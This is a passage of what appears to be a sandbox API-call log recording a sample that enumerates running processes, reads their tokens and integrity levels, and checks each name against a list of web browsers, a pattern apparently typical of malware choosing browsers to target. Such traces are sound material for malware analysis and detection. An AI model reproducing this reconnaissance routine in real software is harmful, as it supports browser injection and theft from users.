(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0230.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0230.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0230.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0230.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0230.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0230.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0230.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0230.917] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.917] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.918] GetLastError () returned 0x7a [0230.918] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.918] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.918] CloseHandle (hObject=0x340) returned 1 [0230.918] CloseHandle (hObject=0x548) returned 1 [0230.918] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.918] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.919] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.919] GetLastError () returned 0x7a [0230.919] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.919] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.919] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.919] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0230.919] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0230.919] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0230.919] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0230.919] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0230.920] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0230.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0230.920] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.920] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.920] GetLastError () returned 0x7a [0230.920] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.920] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.920] CloseHandle (hObject=0x340) returned 1 [0230.920] CloseHandle (hObject=0x548) returned 1 [0230.921] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.921] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.921] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.921] GetLastError () returned 0x7a [0230.921] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.921] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.921] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.921] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0230.921] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0230.922] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0230.922] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0230.922] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0230.922] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0230.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0230.922] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.922] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.922] GetLastError () returned 0x7a [0230.922] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.922] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.923] CloseHandle (hObject=0x340) returned 1 [0230.923] CloseHandle (hObject=0x548) returned 1 [0230.923] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.923] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.923] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.923] GetLastError () returned 0x7a [0230.923] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.923] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.924] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.924] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0230.924] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0230.924] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0230.924] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0230.924] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0230.924] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0230.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0230.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0230.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0230.924] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.925] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.925] GetLastError () returned 0x7a [0230.925] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.925] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.925] CloseHandle (hObject=0x340) returned 1 [0230.925] CloseHandle (hObject=0x548) returned 1 [0230.925] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.925] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.926] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.926] GetLastError () returned 0x7a [0230.926] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.926] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.926] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.926] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0230.926] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0230.926] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0230.926] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0230.926] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0230.926] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0230.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0230.927] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.927] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.927] GetLastError () returned 0x7a [0230.927] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.927] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.927] CloseHandle (hObject=0x340) returned 1 [0230.927] CloseHandle (hObject=0x548) returned 1 [0230.927] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.927] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.927] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.928] GetLastError () returned 0x7a [0230.928] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.928] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.928] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.928] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0230.928] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0230.928] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0230.928] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0230.928] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0230.928] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0230.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0230.928] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.928] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.928] GetLastError () returned 0x7a [0230.928] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.929] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.929] CloseHandle (hObject=0x340) returned 1 [0230.929] CloseHandle (hObject=0x548) returned 1 [0230.929] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.929] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.929] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.929] GetLastError () returned 0x7a [0230.929] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.929] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.929] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.929] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0230.929] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0230.929] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0230.930] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0230.930] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0230.930] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0230.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0230.930] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.930] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.930] GetLastError () returned 0x7a [0230.930] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.930] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.930] CloseHandle (hObject=0x340) returned 1 [0230.930] CloseHandle (hObject=0x548) returned 1 [0230.930] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.930] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.931] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.931] GetLastError () returned 0x7a [0230.931] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.931] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.931] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.931] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0230.931] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0230.931] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0230.931] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0230.931] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0230.931] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0230.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0230.931] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.931] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.931] GetLastError () returned 0x7a [0230.932] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.932] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.932] CloseHandle (hObject=0x340) returned 1 [0230.932] CloseHandle (hObject=0x548) returned 1 [0230.932] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.932] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.932] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.932] GetLastError () returned 0x7a [0230.932] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.932] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.932] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.932] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0230.932] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0230.932] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0230.932] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0230.932] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0230.933] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0230.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0230.933] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.933] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.933] GetLastError () returned 0x7a [0230.933] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.933] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.933] CloseHandle (hObject=0x340) returned 1 [0230.933] CloseHandle (hObject=0x548) returned 1 [0230.933] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.933] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.933] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, 